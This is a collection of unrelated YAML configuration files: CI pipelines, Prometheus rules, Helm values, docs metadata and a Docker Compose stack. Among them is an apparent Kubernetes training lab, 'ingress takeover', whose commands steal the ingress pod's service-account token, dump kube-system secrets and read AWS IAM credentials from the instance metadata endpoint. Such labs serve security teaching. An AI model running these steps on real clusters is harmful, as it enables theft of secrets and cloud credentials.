x-twitter: apievangelist
email: <EMAIL>
---
|
_data/bizimply.yaml
|
nameWithType: NicIPConfiguration.UpdateStages.WithLoadBalancer.withExistingLoadBalancerBackend
type: method
members:
- fullName: com.microsoft.azure.management.network.NicIPConfiguration.UpdateStages.WithLoadBalancer.withExistingLoadBalancerBackend(LoadBalancer loadBalancer, String backendName)
name: withExistingLoadBalancerBackend(LoadBalancer loadBalancer, String backendName)
nameWithType: NicIPConfiguration.UpdateStages.WithLoadBalancer.withExistingLoadBalancerBackend(LoadBalancer loadBalancer, String backendName)
parameters:
- description: <p>an existing load balancer </p>
name: loadBalancer
type: <xref href="com.microsoft.azure.management.network.LoadBalancer?alt=com.microsoft.azure.management.network.LoadBalancer&text=LoadBalancer" data-throw-if-not-resolved="False"/>
- description: <p>the name of an existing backend on that load balancer </p>
name: backendName
type: <xref href="String?alt=String&text=String" data-throw-if-not-resolved="False"/>
returns:
description: <p>the next stage of the update </p>
type: <xref href="com.microsoft.azure.management.network.NicIPConfiguration.Update?alt=com.microsoft.azure.management.network.NicIPConfiguration.Update&text=NicIPConfiguration.Update" data-throw-if-not-resolved="False"/>
summary: <p>Specifies the load balancer to associate this IP configuration with. </p>
syntax: public Update withExistingLoadBalancerBackend(LoadBalancer loadBalancer, String backendName)
uid: com.microsoft.azure.management.network.NicIPConfiguration.UpdateStages.WithLoadBalancer.withExistingLoadBalancerBackend(LoadBalancer,String)
uid: com.microsoft.azure.management.network.NicIPConfiguration.UpdateStages.WithLoadBalancer.withExistingLoadBalancerBackend*
fullName: com.microsoft.azure.management.network.NicIPConfiguration.UpdateStages.WithLoadBalancer.withExistingLoadBalancerBackend
name: withExistingLoadBalancerBackend(LoadBalancer loadBalancer, String backendName)
package: com.microsoft.azure.management.network
metadata: {}
|
legacy/docs-ref-autogen/com.microsoft.azure.management.network.NicIPConfiguration.UpdateStages.WithLoadBalancer.withExistingLoadBalancerBackend.yml
|
# Lab 01 — ingress takeover: ordered command walkthrough.
# FIX: the steps are now a YAML sequence. As a flat mapping, the repeated
# name/description/command keys were duplicate keys — invalid per the YAML
# spec; most parsers silently keep only the last occurrence (only step14
# would survive a load). Commands containing "Authorization: Bearer" are
# single-quoted: an unquoted ": " inside a plain scalar is a parse error.
- name: step01
  description: deploy nginx ingress controller to the cluster
  command: kubectl apply -f https://raw.githubusercontent.com/kubernetes/ingress-nginx/controller-v0.40.2/deploy/static/provider/aws/deploy.yaml
- name: step02
  description: set the ingress pod name as an env var
  command: POD_NAME=$(kubectl get pods -n ingress-nginx --field-selector status.phase=Running -o json | jq -r '.items[].metadata.name')
- name: step03
  description: validate list all secrets in the ingress cluster role
  command: kubectl get clusterroles ingress-nginx --all-namespaces -o=yaml
- name: step04
  description: demonstrate how list all secrets is with the admin kubeconfig
  command: kubectl get secrets --all-namespaces -o=yaml
- name: step05
  description: filter the secrets owned by service accounts
  command: kubectl get secrets --all-namespaces -o=json | jq '.items[].metadata.annotations' | grep 'service-account.name'
- name: step06
  description: set the ingress nginx as an env var
  command: NAMESPACE=ingress-nginx
- name: step07
  description: set the ingress token as an env var
  command: TOKEN=$(kubectl exec $POD_NAME -n $NAMESPACE -- cat /var/run/secrets/kubernetes.io/serviceaccount/token)
- name: step08
  description: find the kubernetes api server
  command: kubectl exec $POD_NAME -n $NAMESPACE -- netstat | grep kubernetes
- name: step09
  description: set the api server address as an env var, should be fqdn
  command: API_SERVER=<REPLACE WITH OUTPUT FROM STEP08>
- name: step10
  description: test connectivity to the api server from within the pod
  command: 'kubectl exec $POD_NAME -n $NAMESPACE -- curl https://$API_SERVER/api --header "Authorization: Bearer $TOKEN" --insecure'
- name: step11
  description: get all kube-system secrets from within the pod using the ingress token
  command: 'kubectl exec $POD_NAME -n $NAMESPACE -- curl https://$API_SERVER/api/v1/namespaces/kube-system/secrets --header "Authorization: Bearer $TOKEN" --insecure'
- name: step12
  description: test egress internet connectivity
  command: kubectl exec $POD_NAME -n $NAMESPACE -- curl https://ipinfo.io/json
- name: step13
  description: set the aws node name as an env var
  command: NODE=$(kubectl exec $POD_NAME -n $NAMESPACE -- curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/)
- name: step14
  description: set the metadata token as an env var in one liner
  command: NODE=$(kubectl exec $POD_NAME -n $NAMESPACE -- curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/) && METADATA_TOKEN=$(kubectl exec $POD_NAME -n $NAMESPACE -- curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/$NODE)
|
labs/lab01-ingress_takeover/lab01-ingress_takeover.yaml
|
---
# Elasticsearch cluster-health alerting rules, scraped by the "k8s"
# Prometheus via the prometheus/role labels.
# FIX: removed the stray unmatched ")" from the Red/Yellow alert messages
# and corrected the "relocationg" typo in the relocating-shards message.
apiVersion: monitoring.coreos.com/v1
kind: PrometheusRule
metadata:
  labels:
    prometheus: k8s
    role: alert-rules
  name: es-rules
  namespace: logging
spec:
  groups:
  - name: es.rules
    rules:
    - alert: ElasticClusterRed
      expr: elasticsearch_cluster_health_status{color="red"} == 1
      for: 30m
      labels:
        severity: critical
      annotations:
        message: 'Elastic Cluster status is Red, cluster: {{ $labels.cluster }}'
        doc: "Elastic Cluster status is Red in the last 30 minutes."
    - alert: ElasticClusterYellow
      expr: elasticsearch_cluster_health_status{color="yellow"} == 1
      for: 30m
      labels:
        severity: warning
      annotations:
        message: 'Elastic Cluster status is Yellow, cluster: {{ $labels.cluster }}'
        doc: "Elastic Cluster status is Yellow in the last 30 minutes."
    - alert: ElasticNumberOfRelocationShards
      expr: elasticsearch_cluster_health_relocating_shards > 0
      for: 30m
      labels:
        severity: warning
      annotations:
        message: 'Number of relocating shards in the last 30 min: {{ $value }} in the cluster: {{ $labels.cluster }}'
        doc: "Number of relocation shards for 30 min"
    - alert: ElasticNumberOfInitializingShards
      expr: elasticsearch_cluster_health_initializing_shards > 0
      for: 30m
      labels:
        severity: warning
      annotations:
        message: 'Number of initializing shards in the last 30 min: {{ $value }} in the cluster: {{ $labels.cluster }}'
        doc: "Number of initializing shards in the last 30 min."
    - alert: ElasticNumberOfUnassignedShards
      expr: elasticsearch_cluster_health_unassigned_shards > 0
      for: 30m
      labels:
        severity: warning
      annotations:
        message: 'Number of unassigned shards in the last 30 min: {{ $value }} in the cluster: {{ $labels.cluster }}'
        doc: "Number of unassigned shards in the last 30 min."
    - alert: ElasticNumberOfPendingTasks
      expr: elasticsearch_cluster_health_number_of_pending_tasks > 0
      for: 30m
      labels:
        severity: warning
      annotations:
        message: 'Number of pending tasks in the last 30 min: {{ $value }} in the cluster: {{ $labels.cluster }}'
        doc: "Number of pending tasks in the last 30 min."
|
katalog/elasticsearch-single/rules.yml
|
jobs:
include:
- language: node_js
node_js:
- 12
env:
- DOCKER_COMPOSE_VERSION=1.29.2
install:
- sudo rm /usr/local/bin/docker-compose
- curl -L https://github.com/docker/compose/releases/download/${DOCKER_COMPOSE_VERSION}/docker-compose-`uname -s`-`uname -m` > docker-compose
- chmod +x docker-compose
- sudo mv docker-compose /usr/local/bin
- npm install -g newman
- sudo ln -s /home/travis/.nvm/versions/node/$(node -v)/bin/newman /usr/local/bin/newman
script:
- cd images/wai-openresty/tests
- ./test.sh
- language: python
python:
- "3.8"
addons:
mariadb: "10.4"
before_install:
- sudo mysql -e 'CREATE DATABASE IF NOT EXISTS test;'
install:
- curl -sLo terraform.zip https://releases.hashicorp.com/terraform/0.12.20/terraform_0.12.20_linux_amd64.zip
- unzip terraform.zip
- sudo mv terraform /usr/local/bin
- rm terraform.zip
- curl -sLo kubeval.tar.gz https://github.com/instrumenta/kubeval/releases/latest/download/kubeval-linux-amd64.tar.gz
- tar xf kubeval.tar.gz
- sudo mv kubeval /usr/local/bin
- pip install -r requirements.txt
- ansible-galaxy install -r playbooks/requirements.yml
- ansible-galaxy collection install -r playbooks/requirements-collection.yml
- git clone --branch v2.12.0 https://github.com/kubernetes-sigs/kubespray.git playbooks/kubespray
script:
- ssh-keygen -t rsa -b 4096 -N '' -f ssh_wai_key
- pwd
- cd infrastructure
- terraform init -backend=false -no-color
- terraform validate -no-color
- cd ..
- ansible-playbook playbooks/wai.yml -i playbooks/inventory/30-localhost --syntax-check
- ansible-playbook playbooks/wai.yml -i playbooks/inventory/30-localhost -t templates
- kubeval playbooks/compiled-templates/k8s/*.yml
- kubeval playbooks/compiled-templates/k8s/**/*.yml
- cat playbooks/compiled-templates/db/*.sql | sudo mysql test -v
- cat playbooks/compiled-templates/db/**/*.sql | sudo mysql test -v
|
.travis.yml
|
documentType: LandingData
title: Integration von Entwicklertools
metadata:
title: Integration von Entwicklertools
meta.description: from-team
services: from-team
author:
manager: from-team
layout: LandingPage
ms.assetid:
ms.service: from-team
ms.tgt_pltfrm: from-team
ms.devlang: from-team
ms.topic: landing-page
ms.date: 09/15/2017
ms.author: from-team
ms.openlocfilehash: 8ed2db241ae79b549f96581b67625114fd658c67
ms.sourcegitcommit: c47ef7899572bf6441627f76eb4c4ac15e487aec
ms.translationtype: HT
ms.contentlocale: de-DE
ms.lasthandoff: 05/04/2018
ms.locfileid: "33206041"
abstract:
description:
sections:
- title:
items:
- type: list
style: cards
className: cardsA
items:
- html: <a href="/java/azure/intellij/azure-toolkit-for-intellij"> <img height="48" width="48" src="https://docs.microsoft.com/media/logos/logo_intellij.svg" alt=""> <br><b>IntelliJ</b></a> <p>Das Azure-Toolkit für IntelliJ stellt Vorlagen und Funktionen bereit, mit denen Sie Azure-Anwendungen mithilfe der IntelliJ-IDE-Entwicklungsumgebung einfach erstellen, entwickeln, testen und bereitstellen können.</p>
- html: <a href="/java/azure/spring-framework/deploy-spring-boot-java-app-with-maven-plugin"> <img height="48" width="48" src="https://docs.microsoft.com/media/logos/logo_maven.svg" alt=""> <br><b>Maven</b></a> <p>Das Maven-Plug-In für Azure-Web-Apps für Apache Maven ermöglicht die nahtlose Integration von Azure App Service in Maven-Projekte und optimiert für Entwickler den Bereitstellungsprozess für Web-Apps in Azure App Service.</p>
- html: <a href="/java/azure/eclipse/azure-toolkit-for-eclipse"> <img height="48" width="48" src="https://docs.microsoft.com/media/logos/logo_eclipse.svg" alt=""> <br><b>Eclipse</b></a> <p>Das Azure-Toolkit für Eclipse stellt Vorlagen und Funktionen bereit, mit denen Sie Cloudanwendungen mithilfe der Eclipse-IDE-Entwicklungsumgebung (Integrated Development Environment; integrierte Entwicklungsumgebung) einfach in Azure erstellen, entwickeln, testen und bereitstellen können.</p>
- html: <a href="/azure/ansible/"> <img height="48" width="48" src="../media/index/ansible.svg" alt=""> <br><b>Ansible</b></a> <p>Automatisieren von Cloudbereitstellung, Konfigurationsverwaltung und Anwendungsbereitstellungen</p>
- html: <a href="/azure/jenkins/"> <img height="48" width="48" src="https://docs.microsoft.com/media/logos/logo_jenkins.svg" alt=""> <br><b>Jenkins</b></a> <p>Erstellen von Apps in der Cloud und Bereitstellen der Apps in Azure</p>
- html: <a href="/azure/terraform/"> <img height="48" width="48" src="../media/index/terraform.png" alt=""> <br><b>Terraform</b></a> <p>Zuverlässige Versionsverwaltung und Erstellung von Infrastrukturen in Azure</p>
|
articles/integrations/index.yml
|
principais:
- relevance: 'lead'
cls: 'xs12 xl6'
rowClass: "pt-0 px-3 pb-5"
api:
template: "/estadicmunic?categorias=cd_indicador_spai-cd_indicador,ds_fonte,nu_ano_indicador-nu_competencia,spai_vl_indicador_txt&filtros=eq-cd_mun_ibge-{0},and,eq-cd_indicador_spai-'MUNIC_NMDHU542',and,eq-nu_ano_indicador-nu_ano_indicador_max"
args:
- named_prop: "idLocalidade"
args:
- prop: "value"
named_prop: 'spai_vl_indicador_txt'
default: "Sem Registros"
- prop: "description"
fixed: 'Existência de Comitê gestor para o enfrentamento e erradicação do sub-registro de nascimento e a ampliação do acesso à documentação básica'
- prop: 'comment'
template: "({0}, {1})"
args:
- named_prop: "ds_fonte"
- named_prop: "nu_competencia"
- relevance: 'lead'
cls: 'xs12 xl6'
rowClass: "pt-0 px-3 pb-5"
api:
template: "/estadicmunic?categorias=cd_indicador_spai-cd_indicador,ds_fonte,nu_ano_indicador-nu_competencia,spai_vl_indicador_txt&filtros=eq-cd_mun_ibge-{0},and,eq-cd_indicador_spai-'MUNIC_NMDHU575',and,eq-nu_ano_indicador-nu_ano_indicador_max"
args:
- named_prop: "idLocalidade"
args:
- prop: "value"
named_prop: 'spai_vl_indicador_txt'
default: "Sem Registros"
- prop: "description"
fixed: 'Existência de enfrentamento ao sub-registro civil de nascimento e emissão de documentação básica'
- prop: 'comment'
template: "({0}, {1})"
args:
- named_prop: "ds_fonte"
- named_prop: "nu_competencia"
- relevance: 'lead'
cls: 'xs12 xl6'
rowClass: "pt-0 px-3 pb-5"
api:
template: "/estadicmunic?categorias=cd_indicador_spai-cd_indicador,ds_fonte,nu_ano_indicador-nu_competencia,spai_vl_indicador_txt&filtros=eq-cd_mun_ibge-{0},and,eq-cd_indicador_spai-'MUNIC_NMSAU53',and,eq-nu_ano_indicador-nu_ano_indicador_max"
args:
- named_prop: "idLocalidade"
args:
- prop: "value"
named_prop: 'spai_vl_indicador_txt'
default: "Sem Registros"
- prop: "description"
fixed: 'Existência de busca ativa dos casos de nascidos vivos não registrados para promover o registro civil de nascimento'
- prop: 'comment'
template: "({0}, {1})"
args:
- named_prop: "ds_fonte"
- named_prop: "nu_competencia"
# ========================================================
secoes:
- id: "regcivil_unico"
name: ""
cards:
# ========================================================
- id: "map_comite_subregistro"
title:
fixed: "Comitê gestor para o enfrentamento e erradicação do sub-registro de nascimento e a ampliação do acesso à documentação básica"
card_template: "t5"
datasource: "estadicmunic"
cd_indicador: "MUNIC_NMDHU542"
# ========================================================
- id: "map_enfrentamento_subregistro"
title:
fixed: "Enfrentamento ao sub-registro civil de nascimento e emissão de documentação básica"
card_template: "t5"
datasource: "estadicmunic"
cd_indicador: "MUNIC_NMDHU575"
# ========================================================
- id: "map_busca_nascidos"
title:
fixed: "Busca ativa dos casos de nascidos vivos não registrados para promover o registro civil de nascimento"
card_template: "t5"
datasource: "estadicmunic"
cd_indicador: "MUNIC_NMSAU53"
# ========================================================
- id: "map_comite_subregistro_orcamento_proprio"
title:
fixed: "Existe no município Comitê Gestor para o enfrentamento e erradicação de sub-registro civil de nascimento - Dotação orçamentária própria"
card_template: "t5"
datasource: "estadicmunic"
cd_indicador: "MUNIC_NMSUB08"
# ========================================================
- id: "map_enfrentamento_subregistro_orcamento_proprio"
title:
fixed: "Enfrentamento ao sub-registro civil de nascimento e emissão de documentação básica, com dotação orçamentária própria"
card_template: "t5"
datasource: "estadicmunic"
cd_indicador: "MUNIC_NMSUB09"
|
br/observatorio/des/localidade/municipio/regcivil.yaml
|
title: Your awesome title
name: <NAME>'s Website
email: &email <EMAIL>
description: >- # this means to ignore newlines until "baseurl:"
  Write an awesome description for your new site here. You can edit this
  line in _config.yml. It will appear in your document head meta (for
  Google search results) and in your feed.xml site description.
baseurl: "" # the subpath of your site, e.g. /blog
url: https://www.jameseanthony.com # the base hostname & protocol for your site, e.g. http://example.com (Used for Sitemap.xml and RSS feed)
# Includes an icon in the footer for each username you enter
footer-links:
  email: *email
  github: jamesant
  linkedin: jameseanthony
  rss: true # any truthy value enables the RSS icon
  twitter: JamesAn34127990
  stackoverflow: # your stackoverflow profile, e.g. "users/50476/bart-kiers"
# Enter your Disqus shortname (not your username) to enable commenting on posts
# You can find your shortname on the Settings page of your Disqus account
disqus:
# Build settings
#theme: minima
# FIX: `plugins:` was declared twice in this file; duplicate keys are invalid
# YAML and most parsers silently keep only the last occurrence. The two lists
# are merged here into a single declaration.
plugins:
  - jekyll-feed # Create an Atom feed using the official Jekyll feed gem
  - jekyll-sitemap # Create a sitemap using the official Jekyll sitemap gem
# Jekyll 3 now only supports Kramdown for Markdown
kramdown:
  # Use GitHub flavored markdown, including triple backtick fenced code blocks
  input: GFM
  # Jekyll 3 and GitHub Pages now only support rouge for syntax highlighting
  syntax_highlighter: rouge
  syntax_highlighter_opts:
    # Use existing pygments syntax highlighting css
    css_class: 'highlight'
# Set the Sass partials directory, as we're using @imports
sass:
  style: :expanded # You might prefer to minify using :compressed
# Exclude from processing.
# The following items will not be processed, by default.
# Any item listed under the `exclude:` key here will be automatically added to
# the internal "default list".
#
# Excluded items can be processed by explicitly listing the directories or
# their entries' file path in the `include:` list.
#
exclude:
  - LICENSE
  - README.md
  - CNAME
# - .sass-cache/
# - .jekyll-cache/
# - gemfiles/
# - Gemfile
# - Gemfile.lock
# - node_modules/
# - vendor/bundle/
# - vendor/cache/
# - vendor/gems/
# - vendor/ruby/
|
_config.yml
|
---
apiVersion: monitoring.coreos.com/v1
kind: ServiceMonitor
metadata:
name: kubelet
namespace: d8-monitoring
{{- include "helm_lib_module_labels" (list . (dict "prometheus" "main")) | nindent 2 }}
spec:
jobLabel: k8s-app
endpoints:
# API metrics
- port: https-metrics
scheme: https
bearerTokenFile: /var/run/secrets/kubernetes.io/serviceaccount/token
tlsConfig:
insecureSkipVerify: true
honorLabels: true
relabelings:
- regex: endpoint|namespace|pod|service
action: labeldrop
- sourceLabels: [__meta_kubernetes_endpoint_address_target_name]
targetLabel: node
- targetLabel: scrape_endpoint
replacement: kubelet
- targetLabel: tier
replacement: cluster
# CRI metrics
- port: https-metrics
scheme: https
bearerTokenFile: /var/run/secrets/kubernetes.io/serviceaccount/token
tlsConfig:
insecureSkipVerify: true
path: /metrics/cadvisor
honorLabels: true
relabelings:
- regex: endpoint|namespace|pod|service
action: labeldrop
- sourceLabels: [__meta_kubernetes_endpoint_address_target_name]
targetLabel: node
- targetLabel: scrape_endpoint
replacement: cadvisor
- targetLabel: tier
replacement: cluster
metricRelabelings:
# For Containerd metrics, the `container` label is empty for pause containers, but Docker sets the POD value.
# This relabeling rule is required to keep both CRI metrics in sync.
- sourceLabels: [image, name, container]
regex: '(.+);(.+);'
action: replace
targetLabel: container
replacement: "POD"
- sourceLabels: [namespace]
regex: '^$'
action: drop
- sourceLabels: [pod]
regex: '^$'
action: drop
- sourceLabels: [container]
regex: '^$'
action: drop
- regex: container_name|pod_name|id|image|name
action: labeldrop
# Probes metrics
- port: https-metrics
scheme: https
bearerTokenFile: /var/run/secrets/kubernetes.io/serviceaccount/token
tlsConfig:
insecureSkipVerify: true
path: /metrics/probes
honorLabels: true
relabelings:
- regex: endpoint|namespace|pod|service
action: labeldrop
- sourceLabels: [__meta_kubernetes_endpoint_address_target_name]
targetLabel: node
- targetLabel: scrape_endpoint
replacement: probes
- targetLabel: tier
replacement: cluster
selector:
matchLabels:
k8s-app: kubelet
namespaceSelector:
matchNames:
- d8-monitoring
|
modules/340-monitoring-kubernetes/templates/kubelet/service-monitor.yaml
|
namespaceOverride: {{kube_prometheus_stack.namespace | default("kube-prometheus")}}
## Configuration for alertmanager
## ref: https://prometheus.io/docs/alerting/alertmanager/
##
alertmanager:
## Settings affecting alertmanagerSpec
## ref: https://github.com/prometheus-operator/prometheus-operator/blob/master/Documentation/api.md#alertmanagerspec
##
alertmanagerSpec:
## Storage is the definition of how storage will be used by the Alertmanager instances.
## ref: https://github.com/prometheus-operator/prometheus-operator/blob/master/Documentation/user-guides/storage.md
##
storage:
volumeClaimTemplate:
spec:
storageClassName: {{kube_prometheus_stack.alertmanager.storage.storageClassName | default("gluster")}}
accessModes: ["ReadWriteOnce"]
resources:
requests:
storage: {{kube_prometheus_stack.alertmanager.storage.requestSize | default("50Gi")}}
# volumeClaimTemplate:
# spec:
# storageClassName: gluster
# accessModes: ["ReadWriteOnce"]
# resources:
# requests:
# storage: 50Gi
# selector: {}
## Deploy a Prometheus instance
##
prometheus:
prometheusSpec:
## Interval between consecutive scrapes.
## Defaults to 30s.
## ref: https://github.com/prometheus-operator/prometheus-operator/blob/release-0.44/pkg/prometheus/promcfg.go#L180-L183
##
scrapeInterval: {{kube_prometheus_stack.prometheus.scrapeInterval | default("")}}
evaluationInterval: {{kube_prometheus_stack.prometheus.evaluationInterval | default("")}}
## Prometheus StorageSpec for persistent data
## ref: https://github.com/prometheus-operator/prometheus-operator/blob/master/Documentation/user-guides/storage.md
##
storageSpec:
volumeClaimTemplate:
spec:
storageClassName: {{kube_prometheus_stack.prometheus.storage.storageClassName | default("gluster")}}
accessModes: ["ReadWriteOnce"]
resources:
requests:
storage: {{kube_prometheus_stack.prometheus.storage.requestSize | default("50Gi")}}
## Using PersistentVolumeClaim
##
# volumeClaimTemplate:
# spec:
# storageClassName: gluster
# accessModes: ["ReadWriteOnce"]
# resources:
# requests:
# storage: 50Gi
# selector: {}
{%if kube_prometheus_stack.prometheus.resources is defined %}
resources:
{{kube_prometheus_stack.prometheus.resources | to_nice_yaml | indent(6)}}
{% endif %}
grafana:
namespaceOverride: {{kube_prometheus_stack.namespace | default("kube-prometheus")}}
persistence:
enabled: true
type: pvc
storageClassName: {{kube_prometheus_stack.grafana.storage.storageClassName | default("gluster")}}
accessModes:
- ReadWriteOnce
size: {{kube_prometheus_stack.grafana.storage.requestSize | default("4Gi")}}
kube-state-metrics:
namespaceOverride: {{kube_prometheus_stack.namespace | default("kube-prometheus")}}
prometheus-node-exporter:
namespaceOverride: {{kube_prometheus_stack.namespace | default("kube-prometheus")}}
|
helm-values/kube-prometheus-stack/values.tmpl.yaml
|
sudo: false
language: cpp
matrix:
include:
- os: linux
sudo: required
services: docker
env: DOCKER_IMAGE=debian:9
- os: linux
sudo: required
services: docker
env: DOCKER_IMAGE=ubuntu:17.10
- os: linux
sudo: required
services: docker
env: DOCKER_IMAGE=ubuntu:18.04
- os: linux
sudo: required
services: docker
env: DOCKER_IMAGE=ubuntu:18.10
- os: linux
sudo: required
services: docker
env: DOCKER_IMAGE=fedora:26
- os: linux
sudo: required
services: docker
env: DOCKER_IMAGE=fedora:27
- os: linux
sudo: required
services: docker
env: DOCKER_IMAGE=fedora:28
- os: osx
osx_image: xcode7.3
- os: osx
osx_image: xcode8.3
- os: osx
osx_image: xcode9.4
before_install:
- |
if [[ "${TRAVIS_OS_NAME}" == "linux" ]]; then
docker run -d --name linux -v $(pwd):/travis $DOCKER_IMAGE tail -f /dev/null;
docker ps
fi
install:
# install dependencies in debian like systems
- |
if [[ "$DOCKER_IMAGE" == *"ubuntu"* || "$DOCKER_IMAGE" == *"debian"* ]]; then
docker exec -t linux bash -c "apt-get update &&
apt-get install -y build-essential cmake ninja-build libboost-dev"
fi
# install dependencies in red hat like systems
- |
if [[ "$DOCKER_IMAGE" == *"fedora"* ]]; then
docker exec -t linux bash -c "dnf -y group install \"Development Tools\" \"C Development Tools and Libraries\" &&
dnf -y install cmake ninja-build boost-devel"
fi
# install dependencies for macOS
- |
if [[ "${TRAVIS_OS_NAME}" == "osx" ]]; then
brew install cmake || brew upgrade cmake
brew install ninja boost@1.59
brew unlink boost && brew link --force boost@1.59
fi
script:
- |
if [[ "${TRAVIS_OS_NAME}" == "linux" ]]; then
docker exec -t linux bash -c "cd /travis;
mkdir build && cd build && cmake -G Ninja .. &&
ninja && ninja test"
fi
- |
if [[ "${TRAVIS_OS_NAME}" == "osx" ]]; then
cd "${TRAVIS_BUILD_DIR}"
mkdir build && cd build && cmake -G Ninja .. &&
ninja && ninja test
fi
|
.travis.yml
|
language: python
dist: xenial
services:
- xvfb
addons:
apt:
packages:
- herbstluftwm
- libxkbcommon-x11-0
matrix:
fast_finish: true
include:
- name: Latest Env
env:
- VARIANT=yaml
- PY_VER=3.6
- name: py3.6 Newest Tags
env:
- VARIANT=tag
- PY_VER=3.6
- name: py3.6 Master Branch
env:
- VARIANT=dev
- PY_VER=3.6
- name: py3.7 Newest Tags
env:
- VARIANT=tag
- PY_VER=3.7
- name: py3.7 Master Branch
env:
- VARIANT=dev
- PY_VER=3.7
- name: py3.8 Newest Tags
env:
- VARIANT=tag
- PY_VER=3.8
- name: py3.8 Master Branch
env:
- VARIANT=dev
- PY_VER=3.8
allow_failures:
- name: py3.6 Master Branch
env:
- VARIANT=dev
- PY_VER=3.6
- name: py3.7 Newest Tags
env:
- VARIANT=tag
- PY_VER=3.7
- name: py3.7 Master Branch
env:
- VARIANT=dev
- PY_VER=3.7
- name: py3.8 Newest Tags
env:
- VARIANT=tag
- PY_VER=3.8
- name: py3.8 Master Branch
env:
- VARIANT=dev
- PY_VER=3.8
install:
- wget https://repo.continuum.io/miniconda/Miniconda3-latest-Linux-x86_64.sh -O miniconda.sh;
- bash miniconda.sh -b -p $HOME/miniconda
- source "$HOME/miniconda/etc/profile.d/conda.sh"
- conda activate
- hash -r
# Use our condarc
- cp condarc ~/.condarc
- conda config --set always_yes yes --set changeps1 no
- conda install conda-build anaconda-client
- conda update -q conda conda-build
# Reboot conda after updating conda to avoid subtle path bugs
- conda deactivate
- conda activate
# Useful for debugging any issues with conda
- conda info -a
- |
if [ "$VARIANT" = "yaml" ]; then
# Create the environment from yaml
conda env create -q -n pcds-test -f envs/pcds/env.yaml
else
if [ "$VARIANT" = "dev" ]; then
# Add the dev channel to be first channel
conda config --add channels pcds-dev
fi
timeout 10m scripts/create_base_env.sh test pcds "$PY_VER"
fi
- conda activate pcds-test
# Check out the tests for all of our packages
- |
if [ "$VARIANT" = "dev" ]; then
python scripts/test_setup.py
else
python scripts/test_setup.py --tag
fi
# Show us which test scripts exist
- readlink -f */run_tests.py
before_script:
# Run windows manager
- "herbstluftwm &"
- sleep 1
script:
- scripts/run_all_tests.sh pcds
|
.travis.yml
|
confluence:
jmeter_comment_page: 0.03
jmeter_create_and_edit_page:create_page: 0.03
jmeter_create_and_edit_page:create_page_editor: 0.03
jmeter_create_and_edit_page:edit_page: 0.03
jmeter_create_and_edit_page:open_editor: 0.03
jmeter_create_blog:blog_editor: 0.03
jmeter_create_blog:feel_and_publish: 0.03
jmeter_like_page: 0.03
jmeter_login_and_view_dashboard: 0.03
jmeter_search_cql:recently_viewed: 0.03
jmeter_search_cql:search_results: 0.03
jmeter_upload_attachment: 0.03
jmeter_view_attachment: 0.03
jmeter_view_blog: 0.03
jmeter_view_dashboard: 0.03
jmeter_view_page:open_page: 0.03
selenium_create_comment: 0.03
selenium_create_comment:save_comment: 0.03
selenium_create_comment:write_comment: 0.05
selenium_create_page: 0.05
selenium_create_page:open_create_page_editor: 0.01
selenium_create_page:save_created_page: 0.03
selenium_edit_page: 0.03
selenium_edit_page:open_create_page_editor: 0.03
selenium_edit_page:save_edited_page: 0.03
selenium_log_out: 0.03
selenium_login: 0.03
selenium_login:login_and_view_dashboard: 0.03
selenium_login:open_login_page: 0.03
selenium_view_blog: 0.03
selenium_view_dashboard: 0.01
selenium_view_page: 0.03
jira:
jmeter_add_comment:open_comment: 0.09
jmeter_add_comment:save_comment: 0.4
jmeter_browse_boards: 0.2
jmeter_browse_projects: 0.04
jmeter_create_issue:fill_and_submit_issue_form: 0.72
jmeter_create_issue:open_quick_create: 0.15
jmeter_edit_issue:open_editor: 0.15
jmeter_edit_issue:save_edit: 0.3
jmeter_login_and_view_dashboard: 0.2
jmeter_search_jql: 0.09
jmeter_view_backlog: 0.15
jmeter_view_dashboard: 0.05
jmeter_view_issue: 0.2
jmeter_view_kanban_board: 0.15
jmeter_view_project_summary: 0.1
jmeter_view_scrum_board: 0.1
selenium_browse_boards_list: 0.04
selenium_browse_projects_list: 0.09
selenium_create_issue: 0.09
selenium_create_issue:fill_and_submit_issue_form: 0.09
selenium_create_issue:fill_and_submit_issue_form:submit_issue_form: 0.03
selenium_create_issue:open_quick_create: 0.09
selenium_edit_issue: 0.1
selenium_edit_issue:open_edit_issue_form: 0.15
selenium_edit_issue:save_edit_issue_form: 0.08
selenium_log_out: 0.5
selenium_login: 0.1
selenium_login:login_and_view_dashboard: 0.1
selenium_login:open_login_page: 0.5
selenium_project_summary: 0.09
selenium_save_comment: 0.09
selenium_save_comment:open_comment_form: 0.1
selenium_save_comment:submit_form: 0.16
selenium_search_jql: 0.1
selenium_view_dashboard: 0.15
selenium_view_issue: 0.15
selenium_view_kanban_board: 0.05
selenium_view_scrum_board: 0.04
selenium_view_scrum_board_backlog: 0.05
|
app/reports_generation/tolerances.yml
|
# Local development Docker Compose stack for the django_pro1_iot project:
# Django app + Postgres + Sphinx docs + Redis + Celery worker/beat + Flower.
version: '3'
volumes:
  # Named volumes so Postgres data and backups survive container recreation.
  django_pro1_iot_local_postgres_data: {}
  django_pro1_iot_local_postgres_data_backups: {}
services:
  # &django anchors the common service definition; the celery services
  # below reuse it via the <<: merge key and override only what differs.
  django: &django
    build:
      context: .
      dockerfile: ./compose/local/django/Dockerfile
    image: django_pro1_iot_local_django
    container_name: django_pro1_iot_local_django
    # Pin to x86_64 so the image also builds/runs on non-x86 hosts (e.g. Apple Silicon).
    platform: linux/x86_64
    depends_on:
      - postgres
      - redis
    volumes:
      # :z applies a shared SELinux label to the bind mount.
      - .:/app:z
    env_file:
      - ./.envs/.local/.django
      - ./.envs/.local/.postgres
    ports:
      - "8000:8000"
    command: /start
  postgres:
    build:
      context: .
      dockerfile: ./compose/production/postgres/Dockerfile
    image: django_pro1_iot_production_postgres
    container_name: django_pro1_iot_local_postgres
    volumes:
      # :Z = private SELinux label (data dir used by this container only),
      # :z = shared label (backups dir).
      - django_pro1_iot_local_postgres_data:/var/lib/postgresql/data:Z
      - django_pro1_iot_local_postgres_data_backups:/backups:z
    env_file:
      - ./.envs/.local/.postgres
  docs:
    image: django_pro1_iot_local_docs
    container_name: django_pro1_iot_local_docs
    platform: linux/x86_64
    build:
      context: .
      dockerfile: ./compose/local/docs/Dockerfile
    env_file:
      - ./.envs/.local/.django
    volumes:
      - ./docs:/docs:z
      - ./config:/app/config:z
      - ./django_pro1_iot:/app/django_pro1_iot:z
    ports:
      - "9000:9000"
    command: /start-docs
  redis:
    image: redis:6
    container_name: django_pro1_iot_local_redis
